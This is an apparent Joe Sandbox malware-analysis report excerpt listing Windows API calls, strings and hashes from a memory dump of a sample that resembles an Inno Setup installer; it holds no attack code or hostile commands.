                                                          • Instruction ID: 1704218a4531d37ac2ab58ce54688b95f7f5c665c469e7ed4027bbe581d59bf2
                                                          • Opcode Fuzzy Hash: 6561eb4d383449756189e8e73bad2b2324663fde54b6a94536ab2f09e4d2584d
                                                          • Instruction Fuzzy Hash: C42190BA704201AFCB00DE69CD85E6BB7DAEFC4340F148A3AF944C7249E638ED058755
                                                          APIs
                                                          • GetCursorPos.USER32 ref: 00417258
                                                          • SetCursor.USER32(00000000), ref: 0041729B
                                                          • GetLastActivePopup.USER32(?), ref: 004172C5
                                                          • GetForegroundWindow.USER32(?), ref: 004172CC
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                          • String ID:
                                                          • API String ID: 1959210111-0
                                                          • Opcode ID: 7e2e89ac6d78113517a7cdb08ff1bb3a8e6934fc8f6f5a4bd5de53d8afa5f26a
                                                          • Instruction ID: d8f212eab659ab8611038d963e52f28b2b0f2619fe8d71a0b25c9b868ff876e9
                                                          • Opcode Fuzzy Hash: 7e2e89ac6d78113517a7cdb08ff1bb3a8e6934fc8f6f5a4bd5de53d8afa5f26a
                                                          • Instruction Fuzzy Hash: B121B0303486008AC710AB69D944AEB33F1EF58724B1145BBF8459B392DB3DDC82CB8D
                                                          APIs
                                                          • MulDiv.KERNEL32(8B500000,00000008,?), ref: 00494AFD
                                                          • MulDiv.KERNEL32(50142444,00000008,?), ref: 00494B11
                                                          • MulDiv.KERNEL32(F70A2BE8,00000008,?), ref: 00494B25
                                                          • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 00494B43
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: da8da1de4e7f5bc81aa34d833cd20809ae9834e6658fde7f29423bed1a0b2134
                                                          • Instruction ID: 4e21b8649f01b029d01931fbc34569bb41b57a17a8c4fb2cd57aac9c741bb68b
                                                          • Opcode Fuzzy Hash: da8da1de4e7f5bc81aa34d833cd20809ae9834e6658fde7f29423bed1a0b2134
                                                          • Instruction Fuzzy Hash: 1F113072605104AFCF40DFA9C8C5E9B7BECEF8D320B1541AAF908DB246D634ED418B68
                                                          APIs
                                                          • GetClassInfoA.USER32(00400000,0041F468,?), ref: 0041F499
                                                          • UnregisterClassA.USER32(0041F468,00400000), ref: 0041F4C2
                                                          • RegisterClassA.USER32(00499598), ref: 0041F4CC
                                                          • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F507
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Class$InfoLongRegisterUnregisterWindow
                                                          • String ID:
                                                          • API String ID: 4025006896-0
                                                          • Opcode ID: 369d2da58285a6866fdf7dc2e280d06892b8d6024adb0aca680e52ce00aa00df
                                                          • Instruction ID: e4d668e9dca91fd32e585eae6d60143d6dfbdf42e70c096e3b85bfad9ab1786c
                                                          • Opcode Fuzzy Hash: 369d2da58285a6866fdf7dc2e280d06892b8d6024adb0aca680e52ce00aa00df
                                                          • Instruction Fuzzy Hash: 63016D722001046BDB10EBACED81E9B3798A729314B10423FBA15E73A2D7399D458BAC
                                                          APIs
                                                          • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D20F
                                                          • LoadResource.KERNEL32(00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?,?,0047C33C,0000000A,00000000), ref: 0040D229
                                                          • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?,?,0047C33C), ref: 0040D243
                                                          • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9B0,00400000,00000001,00000000,?,0040D16C,00000000,?,00000000,?), ref: 0040D24D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindLoadLockSizeof
                                                          • String ID:
                                                          • API String ID: 3473537107-0
                                                          • Opcode ID: 0bf80b66a5ada5cede639d51b96412ae59566757451319f02a49a05eb7d51380
                                                          • Instruction ID: 3283e33870439dafd25d8e1e147512606e62b5bf6a0133693b61d2317928fdf1
                                                          • Opcode Fuzzy Hash: 0bf80b66a5ada5cede639d51b96412ae59566757451319f02a49a05eb7d51380
                                                          • Instruction Fuzzy Hash: C5F04FB26056047F8B04EE99A881D5B77DDDE88264314027EF908EB242DA38DD018B69
                                                          APIs
                                                          • GetLastError.KERNEL32(?,00000000), ref: 00470411
                                                          Strings
                                                          • Failed to set NTFS compression state (%d)., xrefs: 00470422
                                                          • Setting NTFS compression on file: %s, xrefs: 004703DF
                                                          • Unsetting NTFS compression on file: %s, xrefs: 004703F7
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                          • API String ID: 1452528299-3038984924
                                                          • Opcode ID: 32800ea80ef7f340448f7304649e5167e10847fac6a49cadc2e3199de093b0c6
                                                          • Instruction ID: 0d596443d05caf7374ea98a63d842d8765eee9d82fb477a7c18f0f713548320e
                                                          • Opcode Fuzzy Hash: 32800ea80ef7f340448f7304649e5167e10847fac6a49cadc2e3199de093b0c6
                                                          • Instruction Fuzzy Hash: 3601A730E0924896CB14D7AD94412EDBBB48F09304F54C1EFB85CE7382DB780A098B9A
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,00000000), ref: 0046FC65
                                                          Strings
                                                          • Setting NTFS compression on directory: %s, xrefs: 0046FC33
                                                          • Failed to set NTFS compression state (%d)., xrefs: 0046FC76
                                                          • Unsetting NTFS compression on directory: %s, xrefs: 0046FC4B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast
                                                          • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                          • API String ID: 1452528299-1392080489
                                                          • Opcode ID: b5dc9d2579f2018d9a7d7e75725accde34884e18dd6de742cde32242bcb11ea0
                                                          • Instruction ID: 1ff60dd8eb5a114f2a7af6b3d642365226de0c959c43d8a3966afd89414ec8a0
                                                          • Opcode Fuzzy Hash: b5dc9d2579f2018d9a7d7e75725accde34884e18dd6de742cde32242bcb11ea0
                                                          • Instruction Fuzzy Hash: 5B011730E0824C56CB04D7ADA4412DDBBB4AF4D314F54C5BFA899D7382EA790A0D879B
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5CE,?,?,?,?,?,00000000,0045B5F5), ref: 00455DAC
                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B5CE,?,?,?,?,?,00000000), ref: 00455DB5
                                                          • RemoveFontResourceA.GDI32(00000000), ref: 00455DC2
                                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455DD6
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                          • String ID:
                                                          • API String ID: 4283692357-0
                                                          • Opcode ID: cc4ceb729e222824fe1cac9382ec9995b1fa7ba0c709305ca7eece31e51928de
                                                          • Instruction ID: 990a694f9916720730b0810028faebd1b23d30e86244cf38efb64550af4b0806
                                                          • Opcode Fuzzy Hash: cc4ceb729e222824fe1cac9382ec9995b1fa7ba0c709305ca7eece31e51928de
                                                          • Instruction Fuzzy Hash: 7CF090B274070036EA10B6B65C46F2B12DC8F54745F10883AB500EF2C3D57CDC044629
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$CountSleepTick
                                                          • String ID:
                                                          • API String ID: 2227064392-0
                                                          • Opcode ID: 4bb6a74b997c72d79b8ad59ba38197016887a39ac959a09613ad40c6f540370d
                                                          • Instruction ID: a2b460aa88ecba94892aad5d964071206a8b0d845d3bc1a6a013ae29a0728730
                                                          • Opcode Fuzzy Hash: 4bb6a74b997c72d79b8ad59ba38197016887a39ac959a09613ad40c6f540370d
                                                          • Instruction Fuzzy Hash: 6FE02B627C916065C62131BE18C25BF464CCBC3364B24463FF0CCE7242C85D5C4A873E
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7,00000000), ref: 00477CA1
                                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA,?,?,?,?,?,004981E7), ref: 00477CA7
                                                          • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA), ref: 00477CC9
                                                          • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004808CA), ref: 00477CDA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                          • String ID:
                                                          • API String ID: 215268677-0
                                                          • Opcode ID: b789e398f767a3985276fb9b5d86dc0112f39c9ab3e6b0e60025eb20b1cc62c1
                                                          • Instruction ID: 672a73815fb629360b1666c66e1be5f1e4265ed7d7d078eef31aabbee9319095
                                                          • Opcode Fuzzy Hash: b789e398f767a3985276fb9b5d86dc0112f39c9ab3e6b0e60025eb20b1cc62c1
                                                          • Instruction Fuzzy Hash: 5FF037716447007FD600E6B58D81E5B73DCEB44354F04883A7E94D71C1D678DC08A726
                                                          APIs
                                                          • GetLastActivePopup.USER32(?), ref: 00424244
                                                          • IsWindowVisible.USER32(?), ref: 00424255
                                                          • IsWindowEnabled.USER32(?), ref: 0042425F
                                                          • SetForegroundWindow.USER32(?), ref: 00424269
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                          • String ID:
                                                          • API String ID: 2280970139-0
                                                          • Opcode ID: d650e12b06832ca1638fa5ec8b7c167202b76d470459cb5fe6943c9b368570a5
                                                          • Instruction ID: 914cdc97238bca482b123af495550876eb6964b08c7fad051248fc704dde4b2b
                                                          • Opcode Fuzzy Hash: d650e12b06832ca1638fa5ec8b7c167202b76d470459cb5fe6943c9b368570a5
                                                          • Instruction Fuzzy Hash: DEE0EC61706636D7AAA2767B2981A9F618D9DC53C434601ABFC04FB386DB2CDC1181BD
                                                          APIs
                                                          • GlobalHandle.KERNEL32 ref: 0040626F
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                          • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                          • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocHandleLockUnlock
                                                          • String ID:
                                                          • API String ID: 2167344118-0
                                                          • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                          • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                          • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                          • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                          APIs
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B44D,?,00000000,00000000,00000001,00000000,00479E79,?,00000000), ref: 00479E3D
                                                          Strings
                                                          • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00479CB1
                                                          • Failed to parse "reg" constant, xrefs: 00479E44
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                          • API String ID: 3535843008-1938159461
                                                          • Opcode ID: 57bad9c4411a7bf74c6c2dc4fda695579502af0604f82715b5200038b1ffad30
                                                          • Instruction ID: 5eaaab04e28549974a1eae9ca1a9eb8293ffddd3d671f6967ea537ac56f3ac17
                                                          • Opcode Fuzzy Hash: 57bad9c4411a7bf74c6c2dc4fda695579502af0604f82715b5200038b1ffad30
                                                          • Instruction Fuzzy Hash: 81814174E00148AFCF11DF95C881ADEBBF9AF49314F50816AE815BB391D738AE45CB98
                                                          APIs
                                                          • GetForegroundWindow.USER32(00000000,00482CD2,?,00000000,00482D13,?,?,?,?,00000000,00000000,00000000,?,0046BBB9), ref: 00482B81
                                                          • SetActiveWindow.USER32(?,00000000,00482CD2,?,00000000,00482D13,?,?,?,?,00000000,00000000,00000000,?,0046BBB9), ref: 00482B93
                                                          Strings
                                                          • Will not restart Windows automatically., xrefs: 00482CB2
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: Window$ActiveForeground
                                                          • String ID: Will not restart Windows automatically.
                                                          • API String ID: 307657957-4169339592
                                                          • Opcode ID: 79c316d51ac1fd79a21ce3b82f97925ffc45febbfcb1c28b0a7bd5593e75f807
                                                          • Instruction ID: 4958210349c6873c441c743532f51790e4d62edc104a08ffbd951144213b1fca
                                                          • Opcode Fuzzy Hash: 79c316d51ac1fd79a21ce3b82f97925ffc45febbfcb1c28b0a7bd5593e75f807
                                                          • Instruction Fuzzy Hash: 3541F130248240AED711FBA5EE96BBD7BE4EB55304F540CB7E8405B3A2D2FD68419B1D
                                                          APIs
                                                          • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                            • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                            • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                            • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                            • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0227C378,00003C84,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                          • String ID: $O
                                                          • API String ID: 296031713-4089063739
                                                          • Opcode ID: 0ec3421781df831a678c5902f9bdaa3f76644b0125f074e6ded90038b86c12b3
                                                          • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                          • Opcode Fuzzy Hash: 0ec3421781df831a678c5902f9bdaa3f76644b0125f074e6ded90038b86c12b3
                                                          • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                          Strings
                                                          • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CB58
                                                          • Failed to proceed to next wizard page; aborting., xrefs: 0046CB44
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                          • API String ID: 0-1974262853
                                                          • Opcode ID: dc43be0607ecfeeda5f653db28b3a442006743007c0b64165f9b1b6a3889c3b5
                                                          • Instruction ID: 55592184c39aac83035684310b8d0626f6b8fe487ab2a4e85d8be474453688ef
                                                          • Opcode Fuzzy Hash: dc43be0607ecfeeda5f653db28b3a442006743007c0b64165f9b1b6a3889c3b5
                                                          • Instruction Fuzzy Hash: 49318D30604208DFD711EB99D98ABAA77F5EB05704F5500BBF448AB3A2D7797E40CB4A
                                                          APIs
                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                          • RegCloseKey.ADVAPI32(?,00478A12,?,?,00000001,00000000,00000000,00478A2D), ref: 004789FB
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478986
                                                          • %s\%s_is1, xrefs: 004789A4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2973159984.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.2973125471.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973247590.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973275511.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973308089.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.2973348383.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_AbC0LBkVhr.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen
                                                          • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                          • API String ID: 47109696-1598650737
                                                          • Opcode ID: 203e9cdef3f3c7d05f9cd135bcc4e7d95a8ba7022c08c76649149ec0e531cbaf
